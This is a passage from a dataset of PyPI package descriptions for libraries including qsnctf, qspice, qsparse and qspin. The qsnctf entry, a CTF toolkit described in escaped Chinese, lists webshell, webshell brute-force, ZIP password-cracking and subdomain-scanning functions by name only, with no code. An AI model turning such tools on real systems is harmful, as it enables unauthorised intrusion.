qsnctf-0.0.4\u4e5f\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u6765\u66f4\u65b0\u6b64\u5e93pipinstall--upgradeqsnctf\u5982\u679c\u4f60\u60f3\u77e5\u9053\u5177\u4f53\u600e\u4e48\u4f7f\u7528\u53ef\u4ee5\u5bfc\u5165\u8fd9\u4e2a\u5305\uff0c\u7136\u540e\u4f7f\u7528help(qsnctf)\u67e5\u770b\u5e93\u7684\u7528\u6cd5>>>importqsnctf\n>>>help(qsnctf)Helponpackageqsnctf:\n\nNAMEqsnctf\n\nPACKAGECONTENTSbasecryptohashmainmiscuuid\n\nFILEc:\\users\\xiniyi\\appdata\\local\\programs\\python\\python39\\lib\\site-packages\\qsnctf-0.0.4-py3.9.egg\\qsnctf\\__init__.py\u7136\u540e\u4f7f\u7528help(qsnctf.PACKAGE CONTENTS)\u6765\u67e5\u770b\u5177\u4f53\u7684\u4f7f\u7528\u65b9\u6cd5\u6f14\u793a\u67e5\u770bbase\u7684\u4f7f\u7528\u65b9\u6cd5>>>help(qsnctf.base)Helponmoduleqsnctf.baseinqsnctNAMEqsnctf.baseDESCRIPTION# Base\u7f16\u7801\u89e3\u7801\u529f\u80fd# 2023\u5e741\u67081\u65e5# \u672b\u5fc3FUNCTIONSbase16_decode(text)base16_encode(text)base32_decode(text)base32_encode(text)base64_decode(text)base64_encode(text)base85_decode(text)>>>\u529f\u80fd\u5217\u8868BASEbase16base32base36base58base62base64base85base91base92base100\u81ea\u5b9a\u4e49base64CRYPTO\u51ef\u6492\u5bc6\u7801\u51ef\u6492\u7206\u7834\u57f9\u6839\u5bc6\u7801ROT5ROT13ROT18\u516b\u5366\u5bc6\u7801\u57c3\u7279\u5df4\u4ec0\u7801\u6469\u65af\u5bc6\u7801\uff08\u652f\u6301\u81ea\u5b9a\u4e49\uff09MD5md5sha1sha224sha256sha384sha512shake128shake256HMAC-SHA256sha3-224sha3-256sha3-385sha3-512MISC\u6838\u5fc3\u4ef7\u503c\u89c2\u52a0\u5bc6\u89e3\u5bc6\u6587\u672c\u9006\u5411url\u52a0\u5bc6\u89e3\u5bc6\u4f4d\u5f02\u6216\u6587\u672c\u9006\u5411\uff08\u6b65\u957f2\uff09\u6587\u672c\u9006\u5411\uff08\u81ea\u5b9a\u4e49\u6b65\u957f\uff09\u83b7\u53d6uuidord\u8f6c\u5b57\u7b26\u4e32\u5b57\u7b26\u4e32\u8f6cord\u5b57\u7b26\u4e32\u5206\u5272flag\u5bfb\u627e\u767e\u5bb6\u59d3\u7f16\u7801Qwerty\u7f16\u7801HTM\u7f16\u7801JSFUCKAAencodestr2hexhex2strZIP\u5bc6\u7801\u7206\u7834ZIP\u89e3\u538b\u7f29\uff08\u9ad8\u7ea7\uff09APIquipqiup\u8bcd\u9891\u5206\u6790\u98de\u4e66Webhook\u9489\u9489Talk\u5fae\u6b65\u5728\u7ebfFOFA\u5927\u5723\u4e91\u6c99\u7bb1\u96f6\u96f6\u4fe1\u5b89Go-CQ-HTTPWEB\u76ee\u5f55\u626b\u63cf\u7f51\u7ad9\u5b58\u6d3b\u68c0\u6d4b\u53d6\u7f51\u7ad9\u6807\u9898\u5b50\u57df\u540d\u626b\u63cf\u53d6\u7f51\u7ad9\u63cf\u8ff0\u53d6\u7f51\u7ad9\u5173\u952e\u5b57\u53d6\u7f51\u7ad9ICP\u53d6\u7f51\u7ad9a\u6807\u7b7e\u5730\u5740\u53d6\u7f51\u7ad9\u6ce8\u91ca\u53d6\u7f51\u7ad9\u54cd\u5e94\u65f6\u95f4\u53d6\u7f51\u7ad9ICOPOST WebshellGET Webshellexec-shelleval-shellWebShell\u7206\u7834\u5177\u4f53\u4f7f\u7528\u547d\u4ee4\u884c\u4f7f\u7528\u7b2c\u4e00\u6b65\u5bfc\u5165qsnctf\u5e93fromqsnctfimport*\u4f8b\u5982\u9700\u8981\u4f7f\u7528base64\u7f16\u7801base64_encode(\"\u9700\u8981\u7f16\u7801\u7684\")# 6ZyA6KaB57yW56CB55qE\u76f8\u540c\u5982\u679c\u4f7f\u7528base64\u89e3\u7801\u7684\u8bdd\u5c31\u662fbase64_decode(\"6ZyA6KaB57yW56CB55qE\")# \u9700\u8981\u7f16\u7801\u7684\u5176\u4ed6\u7684\u7f16\u7801\u89e3\u7801\u7c7b\u4f3c\u7f16\u8bd1\u5668\u4f7f\u7528\u8fd9\u91cc\u8fd8\u662f\u4f7f\u7528base64\u6765\u6f14\u793a\uff0c\u5176\u4ed6\u7684\u7f16\u7801\u89e3\u7801\u7c7b\u4f3c\u3002fromqsnctfimportqsnctfa=base64_encode(\"\u9700\u8981\u7f16\u7801\u7684\")print(a)b=base64_decode(\"6ZyA6KaB57yW56CB55qE\")print(b)\u8fd4\u56de\u4fe1\u606f\u9700\u8981\u7f16\u7801\u76846ZyA6KaB57yW56CB55qEBase62\u7684encode\u503c\u5e94\u8be5\u662f\u6574\u6570\uff01fromqsnctfimportqsnctfa=base62_encode(34441886726)print(a)b=base62_decode(\"base62\")print(b)\u4f20\u53c2\u65b9\u6cd5\u6587\u6863\u79fb\u52a8\u5230\uff1aFunction.md\u73af\u5883\u5f00\u53d1\u73af\u5883Windows11 + Python3.11 + PyCharm 2022.3.1 (Professional Edition)\u4f7f\u7528\u73af\u5883\u652f\u6301python 3.x\u73af\u5883\u3002\u6587\u6863\u6301\u7eed\u66f4\u65b0\u3002\u2728 Contributors\u611f\u8c22\u4e0b\u9762\u7684\u6240\u6709\u4eba\uff1aMoxinxinyiyiye-yfs"} +{"package": "qs_nester", "pacakge-description": "UNKNOWN"} +{"package": "qsolve", "pacakge-description": "QSolveQSolve provides numerical methods for the simulation and optimization\nof ultracold atom experiments at zero and finite temperature.RequirementsUbuntu 22.04 or Windows 11Python 3.11Getting Startedpip install qsolveUpdateTo upgrade the installed qsolve package to its latest version, please use:pip install --upgrade qsolve"} +{"package": "qson", "pacakge-description": "UNKNOWN"} +{"package": "qsonic", "pacakge-description": "Lightining-fast continuum fittingQSOnicis an MPI-parallelized, highly optimized quasar continuum fitting package for DESI built on the same algorithm aspicca, butfaster. It also provides an efficient API to read DESI quasar spectra.The key differencesCoadding of spectrograph arms can be performed after continuum fitting or disabled entirely.Continuum is multiplied by a fiducial mean flux when provided.You can pass fiducial var_lss (columnVAR_LSS) and mean flux (columnMEANFLUX) for observed wavelengthLAMBDAinSTATSextention of a FITS file. Wavelength should be linearly and equally spaced. This is the same format as rawio output from picca, exceptVARcolumn in picca is the variance on flux not deltas. We break away from that convention by explicitly requiring variance on deltas in a new column.If no fiducial is passed, we fit only for var_lss (no eta fitting by default). Eta fitting can be enabled, but is not recommended for Lya forest.Internal weights for continuum fitting and coadding are based on smoothedIVAR, and outputWEIGHTis based on this smoothed ivar. This smoothing can be turned off.Chi2 information as well as best fits are saved in continuum_chi2_catalog.fits. Chi2 is calculated using smooth ivar and var_lss, and does not subtract sum of ln(weights).SimilaritiesDelta files are the same.CONTcolumn is mean flux times continuum even when fiducial mean flux is passed.MEANSNRin header file and chi2 catalog is average of flux times square root of positive ivar values. Header values are per arm, but catalog values are the average over all arms.Eta fitting does not rescaleIVARoutput. Pipeline noise will be modified with explicit calibration option."} +{"package": "qsosed", "pacakge-description": "No description available on PyPI."} +{"package": "qsotools", "pacakge-description": "No description available on PyPI."} +{"package": "qsp", "pacakge-description": "Quantum State PreparationThis repository provides an implementation of various methods for preparing tensor network states (specifically, 1D tensor network states) on a quantum computer.To use the package, you first need to specify a list of NumPy arrays that represent the MPS. You can then\ncall different routines in the package to prepare the state.Installationpip install qspOne can also install the development version directly aspip install git+https://github.com/mohsin-0/qsp.git@mainTutorialUsage tutorialand somebenchmarksBasic Examplefromqsp.tspimportMPSPreparationimportnumpyasnpbond_dim,phys_dim=4,2L=10tensor_array=[np.random.rand(bond_dim,bond_dim,phys_dim)for_inrange(L)]tensor_array[0]=np.random.rand(bond_dim,phys_dim)# end points of mpstensor_array[-1]=np.random.rand(bond_dim,phys_dim)prep=MPSPreparation(tensor_array,shape='lrp')overlap,circ=prep.sequential_unitary_circuit(num_seq_layers=4)ReferencesEncoding of matrix product states into quantum circuits of one-and two-qubit gates,Shi-Ju Ran, Phys. Rev. A 101, 032310 (2020)Variational power of quantum circuit tensor networks,Reza Haghshenas, Johnnie Gray, Andrew C Potter, and Garnet Kin-Lic Chan, Phys. Rev. X 12, 011047 (2022)Preentangling Quantum Algorithms--the Density Matrix Renormalization Group-assisted Quantum Canonical Transformation,Mohsin Iqbal, David Munoz Ramo and Henrik Dreyer, arXiv preprint arXiv:2209.07106 (2022)Efficient adiabatic preparation of tensor network states,Zhi-Yuan Wei, Daniel Malz and Ignacio J. Cirac, Phys. Rev. Research 5, L022037 (2023)"} +{"package": "qs-params", "pacakge-description": "UNKNOWN"} +{"package": "qsparse", "pacakge-description": "QSPARSEQSPARSE provides the open source implementation of the quantization and pruning methods proposed inLearning Low-Precision Structured Subnetworks Using Joint Layerwise Channel Pruning and Uniform Quantization. This library was developed to support and demonstrate strong performance and flexibility among various experiments.Full PrecisionJoint Quantization4bitand Channel Pruning75%importtorch.nnasnnnet=nn.Sequential(nn.Conv2d(3,32,5),nn.ReLU(),nn.ConvTranspose2d(32,3,5,stride=2))importtorch.nnasnnfromqsparseimportprune,quantize,convertnet=nn.Sequential(quantize(nn.Conv2d(3,32,5),bits=4),nn.ReLU(),prune(sparsity=0.75,dimensions={1}),quantize(bits=8),quantize(nn.ConvTranspose2d(32,3,5,stride=2),bits=4))# Automatic conversion is available via `convert`.# Please refer to documentation for more details.InstallationQSPARSE can be installed fromPyPI:pipinstallqsparseUsageDocumentation can be accessed fromRead the Docs.Examples of applying QSPARSE to different tasks are provided atexamplesandmdpi2022.CitingIf you find this open source release useful, please reference in your paper:Zhang, X.; Colbert, I.; Das, S. Learning Low-Precision Structured Subnetworks Using Joint Layerwise Channel Pruning and Uniform Quantization. Appl. Sci. 2022, 12, 7829.https://doi.org/10.3390/app12157829@Article{app12157829,AUTHOR={Zhang, Xinyu and Colbert, Ian and Das, Srinjoy},TITLE={Learning Low-Precision Structured Subnetworks Using Joint Layerwise Channel Pruning and Uniform Quantization},JOURNAL={Applied Sciences},VOLUME={12},YEAR={2022},NUMBER={15},ARTICLE-NUMBER={7829},URL={https://www.mdpi.com/2076-3417/12/15/7829},ISSN={2076-3417}}"} +{"package": "qsparser", "pacakge-description": "qsparserQuery string parser with nested structure supported.UsageStringifyfromqsparserimportstringify# simple objectstringify({'a':'5','b':'c'})# a=5&b=c# nested objectstringify({'a':{'b':'c'},'d':{'e':'f'}})# a[b]=c&d[e]=fParsefromqsparserimportparse# simple stringparse('a=5&b=c')# {'a': '5', 'b': 'c'}# multiple stringparse('a[b]=c&d[e]=f')# {'a': {'b': 'c'},'d': {'e': 'f'}}InstallationpipinstallqsparserChangelog1.1.0Rigid rules on string with null representing content.Use private function names.Authorqsparseris authored by Victor Teo and Chun Tse.LicenseMIT LicenseCopyright (c) 2021 Fillmula Inc.Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qs-parse-rest", "pacakge-description": "No description available on PyPI."} +{"package": "qspd", "pacakge-description": "This package implements Jeongwan Haah's algorithm for quantum signal processing as described in thispaper. It includes a step by step\nalgorithm that decomposes periodic functions (often from quantum signal processing) into a product of primitive matrices,\nrepresented as a list of angles. The algorithmic complexity is O(N3polylog(N/\ud835\udf3a)) where N is the degree of the\nperiodic function and \ud835\udf3a is the precision parameter. The runtime bottleneck is a polynomial rootfinding in step 2. Haah\nconcludes that the error is at most the error input (=15\ud835\udf3a).\nDISCLAIMER: This is in initial investigation stages, and the usage is subject to change."} +{"package": "qspec", "pacakge-description": "qspecA python package for calculations surrounding laser spectroscopy.TheqspecPython package provides mathematical and physical functions\nfrequently used in laser spectroscopy but also more general methods for data processing.\nMost functions are compatible with numpy arrays and are able to process n-dimensional arrays,\neven in the case of arrays of vector- or matrix-objects. This enables fast calculations with large samples of data,\ne.g., facilitating Monte-Carlo simulations.Exemplary, two exciting use cases could be:Coherently evolve atomic state population in a classical laser field.\nIn contrast to powerful packages such asqutip,\nthe quantum mechanical system is set up automatically by just providing atomic state and laser information.Generate modular lineshape models for fitting. The modular system can be used\nto sum, convolve, link models and share parameters, fit hyperfine structure spectra, etc.Included modulestools: General helper, print, data shaping and mathematical functions.stats: Contains functions for the statistical analysis of data.physics: Library of physical functions.algebra: Contains functions to calculate dipole coefficients and Wigner-j symbols.analyze: Contains optimization functions and a class for King-plots.lineshapes: A framework to generate modular lineshape models for fitting.simulate: An intuitive framework to simulate laser-atom interactions."} +{"package": "qspice", "pacakge-description": "PyQSPICEQSPICE is a toolchain of python utilities design to interact specifically with QSPICE.What is contained in this repositoryraw_read.pyA pure python class that serves to read raw files into a python class.spice_editor.py and qsch_editor.pyScripts that can update spice netlists. The following methods are available to manipulate the component values,\nparameters as well as the simulation commands. These methods allow to update a netlist without having to open the\nschematic in Qspice. The simulations can then be run in batch mode (see sim_runner.py).set_element_model('D1', '1N4148') # Replaces the Diode D1 with the model 1N4148set_component_value('R2', '33k') # Replaces the value of R2 by 33kset_parameters(run=1, TEMP=80) # Creates or updates the netlist to have .PARAM run=1 or .PARAM TEMP=80add_instructions(\".STEP run -1 1023 1\", \".dc V1 -5 5\")remove_instruction(\".STEP run -1 1023 1\") # Removes previously added instructionreset_netlist() # Resets all edits done to the netlist.sim_runner.pyA python script that can be used to run Qspice simulations in batch mode without having to open the Qspice GUI.\nThis in cooperation with the classes defined in spice_editor.py or qsch_editor.py is useful because:Can overcome the limitation of only stepping 3 parametersDifferent types of simulations .TRAN .AC .NOISE can be run in a single batchThe RAW Files are smaller and easier to treatWhen used with the RawRead.py and LTSteps.py, validation of the circuit can be done automatically.Different models can be simulated in a single batch, by using the following instructions:Note: It was only tested with Windows based installations.It is based on the spicelib library and therefore most documentation can be found there.The major difference is that in this library all defaults point to the QSpice and the tools that are not pertaining to QSPICE are not mappedHow to Installpip install qspiceUpdating qspicepip install --upgrade qspiceRequirementsspicelibHow to useHere follows a quick outlook on how to use each of the tools.More comprehensive documentation can be found inhttps://spicelib.readthedocs.io/en/latest/This is the base package on which this libray is based, however, not all functionalities\nare ported to this packages.LICENSEGNU V3 License\n(refer to the LICENSE file)RawReadThe example below reads the data from a Spice Simulation called\n\"TRAN - STEP.raw\" and displays all steps of the \"I(R1)\" trace in a matplotlib plotfromqspiceimportRawReadfrommatplotlibimportpyplotaspltrawfile=RawRead(\"TRAN - STEP.raw\")print(rawfile.get_trace_names())print(rawfile.get_raw_property())IR1=rawfile.get_trace(\"I(R1)\")x=rawfile.get_trace('time')# Gets the time axissteps=rawfile.get_steps()forstepinrange(len(steps)):# print(steps[step])plt.plot(x.get_wave(step),IR1.get_wave(step),label=steps[step])plt.legend()# order a legendplt.show()SpiceEditor, QschEditor and SimRunner.pyThis module is used to launch Qspice simulations. Results then can be processed with either the RawRead or with the\nQspiceLogReader module to obtain .MEAS results.The script will firstly invoke the Qspice in command line to generate a netlist, and then this netlist can be updated\ndirectly by the script, in order to change component values, parameters or simulation commands.Here follows an example of operation.fromqspiceimportSimRunner,SpiceEditor,RawRead,sweep_logdefprocessing_data(raw_file,log_file):print(\"Handling the simulation data of%s, log file%s\"%(raw_file,log_file))raw_data=RawRead(raw_file)vout=raw_data.get_wave('V(out)')returnraw_file,vout.max()# select spice modelsim=SimRunner(output_folder='./temp')netlist=SpiceEditor('./testfiles/testfile.net')# set default argumentsnetlist.set_component_value('R1','4k')netlist.set_element_model('V1',\"SINE(0 1 3k 0 0 0)\")# Modifying thenetlist.add_instruction(\".tran 1n 3m\")netlist.add_instruction(\".plot V(out)\")netlist.add_instruction(\".save all\")sim_no=1# .step dec param cap 1p 10u 1forcapinsweep_log(1e-12,10e-6,10):netlist.set_component_value('C1',cap)sim.run(netlist,callback=processing_data,run_filename=f'testfile_qspice_{sim_no}.net')sim_no+=1# Reading the dataresults={}forraw_file,vout_maxinsim:# Iterate over the results of the callback functionresults[raw_file.name]=vout_max# The block above can be replaced by the following line# results = {raw_file.name: vout_max for raw_file, vout_max in sim}print(results)# Sim Statisticsprint('Successful/Total Simulations: '+str(sim.okSim)+'/'+str(sim.runno))input('Press Enter to delete simulation files...')sim.file_cleanup()The example above is using the SpiceEditor to create and modify a spice netlist, but it is also possible to use the\nQschEditor to directly modify the .qsch file. The edited .qsch file can then be opened by the Qspice GUI and the\nsimulation can be run from there.QschEditorThis module is used to create and modify Qspice schematics. The following methods are available to manipulate the\ncomponent values, parameters as well as the simulation commands. These methods allow to update a schematic without\nhaving to open the Qspice GUI. The simulations can then be run in batch mode (see sim_runner.py).The following example shows how to read a Qspice schematic, get the information about the components, change the value\nof a resistor, change the value of a parameter, add a simulation instruction and write the netlist to a file.fromqspiceimportQschEditoraudio_amp=QschEditor(\"./testfiles/AudioAmp.qsch\")print(\"All Components\",audio_amp.get_components())print(\"Capacitors\",audio_amp.get_components('C'))print(\"R1 info:\",audio_amp.get_component_info('R1'))print(\"R2 value:\",audio_amp.get_component_value('R2'))audio_amp.set_parameter('run',1)print(audio_amp.get_parameter('run'))audio_amp.set_parameter('run',-1)print(audio_amp.get_parameter('run'))audio_amp.add_instruction('.tran 0 5m')audio_amp.save_as(\"./testfiles/AudioAmp_rewritten.qsch\")audio_amp.save_netlist(\"./testfiles/AudioAmp_rewritten.net\")Simulation Analysis ToolkitAll the Analysis Toolkit classes are located in the spicelib.sim.toolkit package.\nThe following classes are available:SensitivityAnalysisMontecarloWorstCaseAnalysisPlease refer to the spicelib documentation for more information.fromqspiceimportSimRunner,QschEditor# Imports the class that manipulates the qsch filefromspicelib.sim.tookit.montecarloimportMontecarlo# Imports the Montecarlo toolkit classsallenkey=QschEditor(\"./testfiles/AudioAmp.qsch\")# Reads the qsch file into memoryrunner=SimRunner(output_folder='./temp_mc')# Instantiates the runner with a temp folder setmc=Montecarlo(sallenkey,runner)# Instantiates the Montecarlo class, with the qsch file already in memory# The following lines set the default tolerances for the componentsmc.set_tolerance('R',0.01)# 1% tolerance, default distribution is uniformmc.set_tolerance('C',0.1,distribution='uniform')# 10% tolerance, explicit uniform distributionmc.set_tolerance('V',0,distribution='normal')# 10% tolerance, but using a normal distribution# Some components can have a different tolerancemc.set_tolerance('R1',0.05)# 5% tolerance for R1 only. This only overrides the default tolerance for R1mc.add_instruction('.func mc(x, tol) {x * (1 + tol * 2 * (random() - 0.5))}')# Creates the missing mc() function# Tolerances can be set for parameters as well# mc.set_parameter_deviation('Vos', 3e-4, 5e-3, 'uniform') # The keyword 'distribution' is optionalmc.prepare_testbench(num_runs=1000)# Prepares the testbench for 1000 simulationsmc.editor.save_as('./testfiles/AudioAmp_mc.qsch')# Saves the modified qsch file# Finally the netlist is saved to a filemc.save_netlist('./testfiles/AudioAmp_mc.net')# TODO: Implement the conversion to spice filemc.run(max_runs_per_sim=100)# Runs the simulation with splits of 100 runs eachlogs=mc.read_logfiles()# Reads the log files and stores the results in the results attributelogs.export_data('./temp_mc/data.csv')# Exports the data to a csv filelogs.plot_histogram('fcut')# Plots the histograms for the resultsmc.cleanup_files()# Deletes the temporary filesThe following updates were made to the circuit:The value of each component was replaced by a function that generates a random value within the specified tolerance.The .step param run command was added to the netlist. Starts at -1 which it's the nominal value simulation, and\nfinishes that the number of simulations specified in the prepare_testbench() method.A default value for the run parameter was added. This is useful if the .step param run is commented out.The R1 tolerance is different from the other resistors. This is because the tolerance was explicitly set for R1.The Vos parameter was added to the .param list. This is because the parameter was explicitly set using the\nset_parameter_deviation method.Functions utol, ntol and urng were added to the .func list. These functions are used to generate random values.\nUniform distributions use the mc() function that is inspired on the approach for monte-carlo used in LTspice.Similarly, the worst case analysis can also be setup by using the class WorstCaseAnalysis. Refer to spicelib for more\ninformation.QspiceLogReaderThis module defines a class that can be used to parse Qspice log files where the information about .STEP information is\nwritten. There are two possible usages of this module, either programmatically by importing the module and then\naccessing data through the class as exemplified here:fromqspiceimportQspiceLogReaderdata=QspiceLogReader(\"Batch_Test_AD820_15.log\")print(\"Number of steps :\",data.step_count)step_names=data.get_step_vars()meas_names=data.get_measure_names()# Printing Headersprint(' '.join([f\"{step:15s}\"forstepinstep_names]),end='')# Print steps names with no new lineprint(' '.join([f\"{name:15s}\"fornameinmeas_names]),end='\\n')# Printing dataforiinrange(data.step_count):print(' '.join([f\"{data[step][i]:15}\"forstepinstep_names]),end='')# Print steps names with no new lineprint(' '.join([f\"{data[name][i]:15}\"fornameinmeas_names]),end='\\n')# Print Headerprint(\"Total number of measures found :\",data.measure_count)Other features (Toolkit, logging, etc..)Refer to the spicelib documentation for more information.To whom do I talk to?Tools website :https://www.nunobrum.com/pyltspice.htmlRepo owner :me@nunobrum.comAlternative contact :nuno.brum@gmail.comHistoryVersion 0.5.0Fixes on the montecarlo example.Aligning with spicelib 1.0.1Version 0.4SimAnalysis supporting both Qspice and LTSpice logfiles.FastWorstCaseAnalysis algorithm implementedFix on the log reading of fourier data.Version 0.3Alignment with spicelib 0.8Important Bugfix on the LTComplex class.Fixes and enhancing the analysis toolkit.Version 0.2First operating versionVersion 0.1Reserving library name"} +{"package": "qspider", "pacakge-description": "QSpiderAn easy to use tools module for writing multi-thread and multi-process programs.InstallQSpider could be easily installed using pip:$pipinstallqspiderExampleimportrequestsfromqspiderimportconcurrent# Define a source list for task function to parse.defget_source():\"\"\"Return a url list.\"\"\"return['http://www.baidu.com'foriinrange(500)]# Define the task function and add a thread_func decorator# The thread_func decorator needs a source list, and other options (num_workers, has_result ...) as arguments@concurrent.thread_func(source=get_source(),num_workers=100,has_result=True)defmy_task(task_source):\"\"\"A customized task function.Process the task_source and return the processed results.Arguments:param task_source: the elem in the source list, which is a url here.:rtype: (int) A http status code.\"\"\"url=task_sourceres=requests.get(url,timeout=5)returnres.status_code# Execute the task function.results=my_task()print(results)Results of the example is as below:[Info]500tasksintotal.[\u2714]100%\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501500/500[eta-0:00:00,0.9s,542.9it/s][200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,...,200,200,200,200]Releasesv0.1.1: First release with basic classes.v0.1.2: Reconstruct code, add ThreadManager, ProcessManager and other tool classes.v0.1.3: Fix multiprocess locking bug on Windows.v0.1.4:Add silent argument in manager._run method.Enhance the display style of the progress message.v0.1.5:Make task be either a class, a function or a class method.Add concurrent decorators for convenient use.Add concurrent decorator examples.v0.1.6:Update templates.Replace multiprocessing queue.Support with statement.Optimize displays in jupyter notebook and windows powershell.LicenseCopyright (c) 2020 tishacy.Licensed under theMIT License."} +{"package": "qspin", "pacakge-description": "This is a little package that will help with learning how quantum spin and entanglement work.\nIt is meant to complement some of the \u201ctheoretical minimum\u201d lectures and other web resources:[Quantum state;Pauli matrices;Singlet state;Triplet state;Density matrix;Quantum entanglement;Entropy;Quantum logic gate]Book:Quantum Mechanics - The Theoretical Minimum, Leanoard Susskind and Art Friedman, Basic Books, 2014. (mostly chapters 6&7)http://theoreticalminimum.com/courses/quantum-mechanics/2012/winter/lecture-6and lecture-7Link to documentation on readthedocsInstallpipinstall--upgradeqspinOut-of-the box tests:$python>>>importqspin>>>qspin.all_tests()Examples of code useSpin statesup, down and linear combinations to form mixed states>>>fromqspinimportbra,ket,u,d,s0,sx,sy,sz>>>u|u>>>>d|d>>>>u+d|u>+|d>>>>i=1j>>>u+i*d|u>+i|d>Operators>>>sx# Pauli spin matrix[[01][10]]>>>sy[[0.+0.j-0.-1.j][0.+1.j0.+0.j]]>>>sz[[10][0-1]]>>>sz*u|u>>>>sz*d-|d>Expected value of an observablesz is the observable for z-component of spin, For the \u201cup\u201d state, the only\noutcome us +1, so the expected value is +1.>>u.H*sz*u1.0>>sz.average(u)# another way to compute the average of an observable1.0(q.His Hermetian conjugate; it converts a ket to a bra, as in\\(\\Braket{u|s_z|u}\\)).\nThe operator (sz in this case) is known in quantum mechanics as an observable,\nmeaning it measures something. Here it is the z-component of spin.\nThe eigenvalues of the observable are the possible outcomes the observation.\nUnderlying each state is a wave function. We store the wave function internally\nas vector, with each component being the wave function value for the basis eigenstate.\nThe operators (observables) are stored as matrices, also defined on the same basis.\nThe assumed basis throughout qspin is\\(\\Ket{u}\\)and\\(\\Ket{d}\\)for single particles.>>>u|u>>>>u.phimatrix([[1.],[0.]])EigenvaluesWe can evaluate the eigenvalues and eigenvectors of observables. \u201c.matrix\u201d pulls out the matrix\nrepresentation of the operator.>>>importnumpyasnp>>>sz[[10][0-1]]>>>ev,evec=np.linalg.eig(sz.matrix)>>>evarray([1.,-1.])>>>evecmatrix([[1.,0.],[0.,1.]])>>>sx# spin x[[01][10]]>>>ev,evec=np.linalg.eig(sx.matrix)>>>evarray([1.,-1.])>>>evecmatrix([[0.70710678,-0.70710678],[0.70710678,0.70710678]])There is a handy \u2018eig\u2019 method that produces a list of eigenvalues and a\nlist of eigenvectors, with the eigenvectors being states:>>>ev,evec=sx.eig()>>>evarray([1.,=1.])>>>evec[0.707107|u>+0.707107|d>,-0.707107|u>+0.707107|d>]>>>sz.eig()(array([1.,-1.]),[|u>,|d>])Note that the spin-x observerable has the same eigenvalues as spin-z, +1 and -1. But the eigenvectors\nare different, in our basis, since we are using the {\\(\\Ket{u}\\),\\(\\Ket{d}\\)} basis. They are\\((\\Ket{u} + \\Ket{d})/\\sqrt{2}\\), which measures as sx = +1, and\\((\\Ket{u} - \\Ket{d})/\\sqrt{2}\\), which measures as sx = -1.Conditional ProbabilitiesConditional probabilities are calculated using inner products of states with the\neigenvectors of the measurment, squared. So the probability\nof measuring sx = +1 given the particle is prepared in state\\(\\Ket{u}\\)is:>>>l=(u+d).N# \"left\" state. The .N normalizes the state>>>(bra(l)*ket(u))**2# expected value of up given left0.5>>>np.abs(l.H*u)**2# another way to do this. The .H means Hermetian conjugate; converts ket to bra0.5>>>l.prob(sx,l)1.0>>>l.prob(sx,u)0.5MeasurementThe quantum measurement of an observable involves \u2018collapsing\u2019 the state\nto one of the eigen states of the obserable.>>>l=(u+d).N>>>sz.measure(l)(1.0,|u>)The result is random, either up or down\n(with 50-50 probability in this case where the particle starts out in state \u2018spin left\u2019).\nThe measure function returns the value of the measurment, 1.0 in this case,\nand the collapsed state,\\(\\Ket{u}\\).String Representation of StateWe can use strings to refer to basis states.>>>u=ket('|u>')# or ket('u') (the vert line and bracket are optional)>>>d=ket('|d>')# or ket('d')>>>u|u>>>>d|d>The string representation of basis functions defaults to \u2018u\u2019 and \u2018d\u2019. As\nan alternative, the representation can be set to\n\u20180\u2019 and \u20181\u2019 or to up and down arrows (the later require your\nterminal to have the ability to display unicode characters).>>>qspin.set_base_repr('01')>>>u=ket('0')>>>d=ket('1')>>>(u+d).N0.707107|0>+0.707107|1>Withqspin.set_base_repr('arrow'),u=ket([1,0])renders as\\(\\Ket{\\uparrow}\\)This provides cute printout, but is not too useful for string entry, since the up and\ndown arrows are unicode.Wave Function DefinitionStates can also be defined using the wave function, given\nin the form of a matrix column vector. And it is good practice\nto normalize states.>>>w=ket(np.matrix([1.,1.]).T).N>>>w0.707106781187|u>+0.707106781187|d>Form a projection operator from outer products of basis states.>>rho=ket('|u>')*bra('')*bra('># can also do this:>>u=ket('|u>');d=ket('|d>');>>rho=ket(u)*bra(u)+ket(d)*bra(d)>>>rho[[1.0.][0.1.]]>>>u1.0|u>>>>rho*u1.0|u>>>>rho*d1.0|d>Note that bra(ket(\u2026)) and ket(bra(\u2026)) convert, and takes care of the complex-conjugating.>>u.kind'ket'>>bra(u).kind'bra'Density Matrix and EntropyCreate a density matrix for an ensemble of single particles.>>fromqspinimportentropy>>P=[0.5,0.5]>>rho=P[0]*bra('|u>').density()+P[1]*bra('|d>').density()# make sure the probabilities add to one>>entropy(rho)# it's not zero because there is a mixture of states0.69314718055994529>>rho=(bra('|u>')+bra('|d>')).N.density()>>entropy(rho)# this is zero because all electrons are prepared in the \"u+d\" state0Make sure you normalize any states you define, using the post-operation .N.The von Neumannentropyis\\(S = -\\sum_i(p_i log(p_i))\\)where\\(p_i\\)are the density matrix eigenvalues.\nThe entropy is essentially the randomness in a measurement of the quantum state. It\ncan be applied to any density matrix for either pure or mixed states. (A\npure state has zero entropy.)Multi-particle StatesMulti-particle states are in the space formed from the Kronecker product of Hilbert spaces\nof the individual particles. Since multi-particle quantum states can be mixed states, there\nare far more possible state vectors (\\(2^n\\)dimensional vector space) than for classical\nsystems (which are in only\\(n\\)dimensional space)We build up multi-particle states with Kronecker products \u2018**\u2019 